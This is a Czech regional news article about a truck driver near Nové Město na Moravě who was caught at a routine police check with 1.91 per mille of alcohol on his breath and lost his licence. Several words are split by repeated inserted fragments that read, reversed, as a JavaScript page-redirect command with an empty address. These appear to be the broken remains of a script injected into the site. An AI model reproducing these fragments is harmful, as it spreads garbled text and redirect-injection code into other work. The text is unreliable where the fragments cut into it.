Rainbow page separator

Šofér sedící za volantem náklaďáku nadýchal skoro dvě promile

Pondělí, 25. října 2021

Policie, auto

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Řidiče, který usedl za volant nákladního au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilu poté, co požil ne právě malé množství alkoholu, odhalili v rámci běžné kontroly ve čtvrtek 21. října v dopoledních hodinách policisté na silnici mezi Novým Městem a jeho místní částí Pohledec.
„Řidič s nákladním vozidlem jel před jedenác[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou hodinou dopoledne ve směru od Nového Města na Moravě na Pohledec. Policisté au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobil zastavili a u řidiče provedli kontrolu. U padesátiletého muže při dechové zkoušce naměřili hodnotu 1,91 promile alkoholu. Hodnoty přes jedno a půl promile alkoholu v dechu u něho ukázaly také opakované zkoušky,“ popsala událost policejní mluvčí Jana Kroutilová.
Podnapilý řidič už v další jízdě pokračovat nesměl a policisté mu na místě zadrželi jeho řidičský průkaz. „Muž je nyní podezřelý ze spáchání trestného činu ohrožení pod vlivem návykové látky, případ policisté dále prověřují,“ upřesnila mluvčí.